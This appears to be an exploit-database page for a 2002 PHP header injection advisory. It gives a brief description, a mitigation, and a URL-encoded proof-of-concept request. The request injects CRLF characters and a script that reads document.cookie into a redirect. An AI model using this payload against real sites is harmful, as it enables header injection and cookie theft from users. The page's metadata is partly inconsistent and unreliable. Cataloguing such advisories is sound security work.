header-logo
Suggest Exploit
vendor:
PHP
by:
SecurityFocus
7.5
CVSS
HIGH
PHP Header Injection
94
CWE
Product Name: PHP
Affected Version From: All
Affected Version To: All
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Microsoft Windows, Linux, and Unix
2002

PHP Header Injection

It has been reported that a vulnerability in the PHP header function exists. It may be possible for a user to supply arbitrary script code in an URL that would allow the injection of script code into the HTTP header.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the header function.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5669/info

PHP is a freely available, open source web scripting language package. It is available for Microsoft Windows, Linux, and Unix operating systems.

It has been reported that a vulnerability in the PHP header function exists. It may be possible for a user to supply arbitrary script code in an URL that would allow the injection of script code into the HTTP header. 

http://localhost/redir.php?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%79%61%68%6F
%6F%2E%63%6F%6D%2F%0D%0A%0D%0A%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%
6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E%3C%2
1%2D%2D

Navigation

Suggest Exploit

Services By CQR